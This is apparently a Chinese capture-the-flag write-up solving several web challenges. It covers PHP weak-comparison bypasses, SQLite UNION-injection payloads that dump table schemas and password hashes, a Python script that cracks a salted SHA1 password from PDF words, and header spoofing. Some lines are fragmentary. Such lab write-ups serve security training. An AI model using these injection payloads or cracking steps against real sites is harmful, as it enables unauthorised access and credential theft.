攻防世界web篇10.25

disabled_button

X老师今天上课讲了前端知识，然后给了大家一个不能按的按钮，小宁惊奇地发现这个按钮按不下去，到底怎么才能按下去呢？

删除disable clss="class="btn btn-default"在点击即可看到flag

simple_php

小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。

<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
    echo $flag1;
}
if(is_numeric($b)){
    exit();
}
if($b>1234){
    echo $flag2;
}
?>

（1）如果a=0且a为真，我们可以的到flag1；
（2）is_number($b)的意思是判断b是否为数字，如果为数字则返回，说明此处的b不能为数字不然就执行exit（）了；
（3）要求b大于1234，可以得到flag2；
综上；
b要求非数字并且大于1234，涉及到php的弱类型比较；
本文直接给出b=1235a>1234，且b不为数字；

http://ip/index.php?a=%220%22&b=1235z

@/opt/api/database.sqlite3

html复制到1111.html使用浏览器打开

@/opt/api/database.sqlite3

view_source

X老师让小宁同学查看一个网页的源代码，但小宁同学发现鼠标右键好像不管用了。
f12查看源码

FlatScience

User-agent: *
Disallow: /login.php
Disallow: /admin.php

这里的user存在注入，并且会把结果给我们回显在cookie当中。

usr=1' uninon select 1,2 --+&pw=123

判断字段数，-------order by 或者直接 union select 1，2查看有无报错。
然后判断回显位置如下图所示

usr=-1' union select 1,2 -- +&pw=123

2被回显在了cookie处。下面进行sqlite注入的讲解（不同于mysql）
在sqlite数据库有一张sqlite_master表，存放着相关信息

usr=1' union select 1,group_concat(tbl_name) from sqlite_master where type='table'--&pw=123

在这里插入代码片

usr=1' union select 1,group_concat(sql) from sqlite_master where tbl_name='Users'--&pw=123

name
admin%2Cfritze%2Chansi
passwd
3fab54a50e770d830c0416df817567662a9dc85c%2C54eae8935c90f467427f05e4ece82cf569f89507%2C34b0bb7c304949f9ff2fc101eef0f048be10d3bd

Users表有四个字段：id，name，password，hint，利用group_concat()分别查询name，password和hint字段。执行如下所示的命令

union select 1,group_concat(name,"++++") from Users --+
union select 1,group_concat(password,"++++") from Users --+
union select 1,group_concat(hint,"++++") from Users --+
查询到的结果如下所示

usr=1%27 UNION SELECT id, hint from Users limit 0,1--+&pw=111

name=+my+fav+word+in+my+fav+paper%3F%21
利用脚本对passwd进行解密

from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib

def get_pdf():
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text


def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print "Searching word in " + i
        pdf_text = convert_pdf_2_text(i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
            if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
                print "Find the password :" + word
                exit()

if __name__ == "__main__":
    find_password()

爆破密码为：ThinJerboa

在admin.php里登录

xff_referer

X老师告诉小宁其实xff和referer是可以伪造的。

X-Forwarded-For: 123.123.123.123
referer: https://www.google.com

cyberpeace{b252dd6ade8913315700b7cb94f41312}